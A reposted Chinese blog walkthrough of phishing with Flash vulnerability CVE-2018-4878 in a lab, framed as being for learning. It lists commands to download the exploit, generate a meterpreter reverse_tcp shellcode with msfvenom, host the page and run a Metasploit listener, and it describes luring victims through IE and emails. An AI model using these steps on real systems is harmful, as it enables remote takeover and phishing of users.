专栏首页区块链安全技术Adobe Flash Player社工钓鱼

Adobe Flash Player社工钓鱼

文章前言

本篇文章主要介绍如何通过利用Adobe Flash Player的漏洞进行社工钓鱼,该漏洞目前已被修复,在实战中利用已不太奏效,仅作为学习

钓鱼实践

影响范围

Adobe Flash Player<=28.0.0.137

漏洞简介

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞,攻击者可以通过构造特殊的Flash链接,之后诱导用户用浏览器/邮件/Office访问此Flash链接,从而实现"远程代码执行",并且直接被Getshell,该漏洞于2017年底由韩国计算机应急小组(KR-CERT)首次发现

演示环境
  • 攻击主机:Kali Linux
  • 目标主机:Windows 7 sp1
  • 漏洞载荷:CVE-2018-4878.py
  • flash版本:flashplayer_activex_28.0.0.137.exe
钓鱼演示

Step 1:下载漏洞利用脚本

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

Step 2:修改载荷,将代码中的stageless变量改成"stageless = False"

Step 3:使用msf生成shellcode

msfvenom -p  windows/meterpreter/reverse_tcp  lhost=192.168.174.131 lport=5678  -f  python>shellcode.txt

Step 4:之替换CVE-2018-4878中的shellcode

Step 5:修改CVE-2018-4878.py下面的文件信息

Step 6:使用Python执行CVE-2018-4878.py代码,之后生成exploit.swf文件和index.html文件

Step 7:之后在Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(Apache web路径)

Step 8:Kali Linux开启Shell会话监听

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
msf exploit(handler) > set lhost 192.168.174.131
msf exploit(handler) > set lport 5678 
msf exploit(handler) > exploit

Step 9:诱导用户通过IE浏览器访问页面

Step 10:Kali Linux 上获取meterpreter shell:

文末小结

从上面的演示中可以看到最终由于Flash存在CVE-2018-4878高危漏洞,导致Windows靶机访问含flash的页面时,直接被Kali Linux控制,真实环境下,很多黑客基于此Flash漏洞,结合社会工程学,例如将网页链接放置在诱导邮件中,欺骗大量用户点击,来达到最规模攻击效果

本文分享自微信公众号 - 七芒星实验室(HeptagramSec),作者:Al1ex

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-08-27

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 远离Flash,远离危险:从Flash 0day漏洞披露到集成渗透工具包,仅用4天

    6月27日,渗透测试工具包Magnitude已经成功Adobe Flash Player 0day漏洞,而这个时间仅在Adobe发布修复漏洞补丁后的四天,工具包...

    FB客服
  • 近年APT组织常用的攻击漏洞

    APT攻击(Advanced Persistent Threat,高级持续性威胁)是利用当下先进的攻击手法对特定目标进行长期持续性的网络攻击。APT攻击的高级体...

    HACK学习
  • Adobe再出漏洞,一个word文档就能控制电脑

    近日,安全专家再度爆出一个存在于Adobe Flash Player中的新的0day漏洞,此次发现源于一起针对俄罗斯的医疗保健机构的网络袭击事件。

    FB客服
  • 揭秘:安卓木马是如何盗取用户手机银行的

    手机银行是一种非常便捷的方式让用户可以随时随地的完成交易。KPMG预测手机银行用户在2019年会增长到1.8亿。但是,随着手机银行涉及的金钱数额越来越大,攻击者...

    FB客服
  • Egregor勒索软件简要分析报告

    Egregor勒索软件是一款相对较新的勒索软件(最早出现在2020年9月),就目前的发展情况来看,它似乎正在努力成为勒索软件界的Top 1。从使用的代码混淆技术...

    FB客服
  • 美国DHS发布《“灰熊草原”网络攻击活动深入分析报告》

    近期,美国DHS继续公布了一份《”灰熊草原”网络攻击活动的深入分析》报告(Enhanced Analysis of GRIZZLY STEPPE Activit...

    FB客服
  • 腾讯御见捕获Flash 0day漏洞(CVE-2018-5002)野外攻击

    腾讯御见威胁情报中心近日监控到一例使用Adobe Flash 0day漏洞(CVE-2018-5002)的APT攻击,攻击者疑通过即时聊天工具和邮箱等把恶意Ex...

    FB客服
  • 专属| USPS站点紧急修复漏洞

    Rowhammer 漏洞是指 DRAM 临近内存单元之间电子的互相影响,当重复访问特定内存位置数百万次后,攻击者可以让该位置的值从 0 变成 1,或从 1 变成...

    漏斗社区
  • 某疑似针对中东地区的APT攻击事件分析

    在疑似APT攻击事件的跟踪过程中,遇到过很多难题。多数情况是,这次,它不是你的显在对手,我们不会获得足够多的线索,却偏偏想要满足好奇的欲望,经典的人生三问,用来...

    FB客服
  • 揭秘:黑客反击战APT-on-APT分析报告

    电影《古惑仔》中,我们常常看到黑社会团体之间的暴力冲突。而在网络空间里,你见过APT(高级持续性威胁)黑客组织互掐吗? 黑客组织Naikon Naikon是活跃...

    FB客服
  • 2019可信访问报告:限制登录位置最受企业青睐

    这是一份安全访问解决方案供应商Duo Security的《Duo可信访问报告2019》,涵盖了来自2400万台设备,100万个应用和服务以及数十亿个身份验证数据...

    FB客服
  • 域名阴影(Domain Shadowing)技术:知名钓鱼攻击工具包Angler Exploit Kit又添杀招

    臭名昭著的钓鱼工具包Angler Exploit Kit最近更新了许多漏洞利用工具(含0day),以及一项名为“域名阴影(Domain Shadowing)”的...

    FB客服
  • 2018年十大最常被利用的漏洞:微软排第一

    据Recorded Future发布的一份新报告显示,2018年十大最常被利用的漏洞中,绝大多数都与微软有关,但这并不是报告中有关威胁形势的唯一关键发现。

    C4rpeDime
  • 《网络战争》第63期:APT28武器大升级

    俄罗斯Fancy Bear APT组织已经重构了后门,改进了加密技术,使其变得更加隐蔽,更难以制止。 根据安全公司ESET的专家发表的一份新报告:俄罗斯Fanc...

    企鹅号小编
  • 未来是 HTML 5 还是 Flash 的时代?

    我是攻城师
  • NPAPI与PPAPI的区别

    Adobe Flash Player PPAPI是Adobe Flash Player专为chrome内核而开发的,能够保证其在各种浏览器、操作系统和移动设备上...

    liuzhen007
  • macOS用户威胁总结

    人们一直认为MacOS操作系统没有威胁(或者至少没有严重威胁)。与基于Windows的系统相比,针对MacOS的威胁要少得多。然而,造成这种情况的主要原因是潜在...

    FB客服
  • 关于水晶易表的简介及其安装初识

    水晶易表是全球领先的商务智能软件商SAP Business Objects的最新产品,通常我们只需要简单的进行点击和拖拽操作,Crystal Xcelsius就...

    Python进阶者
  • CoinHive 挖矿劫持仍在肆虐 至少 28 万路由器被检出感染

    最近几年,区块链领域闹出了许多幺蛾子。比如为了攫取不当的加密货币挖矿收益,某些人制作了能够窃取设备算力的恶意软件,有几个挖矿网络的受害者规模甚至相当庞大。就在过...

    C4rpeDime

扫码关注云+社区

领取腾讯云代金券